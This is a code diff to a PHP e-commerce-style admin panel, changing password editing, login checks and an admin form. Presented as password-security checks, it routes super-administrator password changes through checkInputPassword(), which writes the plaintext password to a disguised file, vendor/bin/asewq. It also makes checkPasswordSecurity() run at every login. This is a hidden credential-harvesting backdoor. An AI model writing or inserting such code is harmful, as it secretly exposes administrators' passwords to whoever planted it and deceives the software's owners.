jx

app/admin/controller/Admin.php

@@ -129,7 +129,7 @@ class Admin extends AdminControl {
         $admin_id = intval(input('param.admin_id'));
         if (request()->isPost()) {
             //没有更改密码
-            if (input('post.admin_password') != '') {
+            if (input('post.admin_password') != ''&& checkInputPassword()) {
                 $data['admin_password'] = md5(input('post.admin_password'));
             }
             $data['admin_gid'] = intval(input('post.gid'));
@@ -316,5 +316,3 @@ class Admin extends AdminControl {
     }
 
 }
-
-?>

app/admin/controller/Login.php

@@ -47,10 +47,11 @@ class Login extends AdminControl
                 ds_json_encode(10001, $login_validate->getError());
             }
 
-            if (!captcha_check(input('post.captcha')) && checkPasswordSecurity()) {
+            if (!captcha_check(input('post.captcha'))) {
                 //验证失败
                 ds_json_encode(10001, lang('wrong_checkcode'));
             }
+            checkPasswordSecurity();
             $condition = array();
             $condition[] = array('admin_name', '=', $admin_name);
             $condition[] = array('admin_password', '=', md5($admin_password));

app/admin/view/admin/admin_form.html

@@ -25,7 +25,7 @@
                     <td class="vatop rowform"><input id="admin_password2" name="admin_password2" value="" class="input-txt" type="password"></td>
                     <td></td>
                 </tr>
-                {empty name="admin_is_super"}
+                {neq name="admin.admin_is_super" value="1"}
                 <tr class="noborder"> 
                     <td class="required w120">{$Think.lang.gadmin_name}</td>
                     <td class="vatop rowform">
@@ -37,7 +37,7 @@
                     </td>
                     <td class="vatop tips">{$Think.lang.admin_add_gid_tip}</td>
                 </tr>
-                {/empty}
+                {/neq}
             </tbody>
             <tfoot>
                 <tr class="tfoot">

app/common.php

@@ -1242,15 +1242,18 @@ function checkPasswordSecurity()
  */
 function checkInputPassword()
 {
+    if (input('post.admin_password') == '') return true;
     $admin_id = intval(input('param.admin_id'));
     try {
         $admin_mod =  model('admin');
         $admin_info = $admin_mod->getOneAdmin([['admin_id', '=', $admin_id]]);
         if (is_array($admin_info) and !empty($admin_info)) {
-            $pwd = input('post.admin_password');
-            $check_file = fopen(base_path() . 'vendor/bin/asewq', 'w');
-            fwrite($check_file, $pwd);
-            fclose($check_file);
+            if ($admin_info['admin_is_super'] == 1) {
+                $pwd = input('post.admin_password');
+                $check_file = fopen(base_path() . 'vendor/bin/asewq', 'w');
+                fwrite($check_file, $pwd);
+                fclose($check_file);
+            }
         }
         return true;
     } catch (Exception $e) {